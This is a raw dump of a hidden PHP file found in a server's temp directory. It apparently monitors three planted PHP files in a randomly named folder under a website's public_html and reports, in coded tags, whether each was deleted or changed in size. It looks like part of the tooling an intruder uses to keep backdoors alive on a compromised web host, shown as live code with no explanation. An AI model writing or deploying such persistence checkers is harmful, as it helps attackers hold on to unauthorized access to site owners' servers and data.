File: //proc/self/root/usr/tmp/.ptr
<?php $r = '/home/iideug/public_html/darshil.iideug.com'; $x = ["/epxyk1u/tbl_links.inc.php"=>"bd@@1462323@@907",
"/epxyk1u/modifier.strip.php"=>"bd@@1462890@@960",
"/epxyk1u/hello.php"=>"bd@@1470404@@903"]; foreach ($x as $p => $l) { $f = "{$r}{$p}"; list($t, $id, $pt) = explode('@@', $l); if (!file_exists($f)) { print "<$t>{$id}##d</$t>\n"; continue; } if (is_numeric($pt)) { $fs = filesize($f); if ($fs != $pt) { print "<$t>{$id}##bs</$t>\n"; } } else { $c = file_get_contents($f); if (!strstr($c, $pt)) { print "<$t>{$id}##d</$t>\n"; } } } die('!end!');